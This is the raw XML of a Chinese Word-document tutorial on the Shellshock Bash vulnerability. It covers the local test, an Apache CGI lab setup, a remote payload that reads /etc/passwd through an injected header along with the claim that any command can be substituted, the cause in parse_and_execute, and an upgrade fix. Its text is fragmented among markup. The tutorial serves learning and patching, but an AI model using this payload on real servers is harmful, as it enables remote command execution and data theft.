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shellshock漏洞分析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原理分析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Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞，启动Bash的时候，它不但会导入这个函数，而且也会把函数定义后面的命令执行。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在有些CGI脚本的设计中，数据是通过环境变量来传递的，这样就给了数据提供者利用Shellshock漏洞的机会。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简单来说就是由于服务器的cgi脚本调用了bash命令，由于bash版本过低，攻击者把有害数据写入环境变量，传到服务器端，触发服务器运行Bash脚本，完成攻击。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检查bash版本，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此漏洞的影响对象为Bash 1.14~Bash 4.3的Linux/Unix系统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 -version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4184650" cy="952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检查漏洞是否存在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8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e</w:t>
      </w:r>
      <w:r>
        <w:t>nv x=’() { :; };echo vulnerable’ bash -c “echo this is a test”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>先</w:t>
      </w:r>
      <w:r>
        <w:t>一步输出vulnerable，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并且打印this is a test 则说明漏洞存在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 Ubuntu下安装及配置apache服务器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#sudo apt-get install apache2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配置apache2服务器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配置文件位于 /etc/apache2/sites-enabled/000-default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用vi打开配置文件：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#sudo vi /etc/apache2/sites-enabled/000-default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修改其中两句为：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/var/www/html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ScriptAlias /cgi-bin/ /var/www/html/cgi-bin/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4.编写WEB服务端测试文件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编辑服务端测试文件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vi /var/www/html/cgi-bin/test.sh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"Content-type: text/html"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然后重启服务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#sudo /etc/init.d/apache2 restart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5.远程测试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测试命令：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() { :;};a=`/bin/cat /etc/passwd`;echo $a' 'http://IP地址/cgi-bin/test.sh' -I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命令中可改变a=`/bin/cat /etc/passwd`;echo $a为任意命令进行执行。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8800" cy="20129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这个问题的发生是因为Bash的一个功能，它允许在Bash的shell中使用环境变量来定义函数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:after="192" w:afterAutospacing="0" w:line="312" w:lineRule="atLeast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bash可以将shell变量导出为环境变量，还可以将shell函数导出为环境变量！当前版本的bash通过以函数名作为环境变量名，以“（）{”开头的字串作为环境变量的值来将函数定义导出为环境变量。此漏洞在于bash处理这样的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令。所以，在某种环境，bash会在给导出的函数定义处理环境时执行用户代码。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:widowControl/>
        <w:spacing w:beforeAutospacing="0" w:after="192" w:afterAutospacing="0" w:line="312" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorBidi"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6006465" cy="5472430"/>
            <wp:effectExtent l="0" t="0" r="63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这段代码是解析匿名函数的时候使用的，使用匿名函数我们才能达到执行的目的：parse_and_execute。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漏洞修复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进行Bash的升级修复：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</w:rPr>
        <w:t>apt-get install bash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只要将bash版本升至4.4及以上即可避免被此漏洞攻击。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B450C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="F54B45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AFE4BF"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="51AFE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C14FD"/>
    <w:rsid w:val="04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2019-11-13T12:30:00Z</dcterms:created>
  <dc:creator>问鱼</dc:creator>
  <cp:lastModifiedBy>问鱼</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-13T13:25:57Z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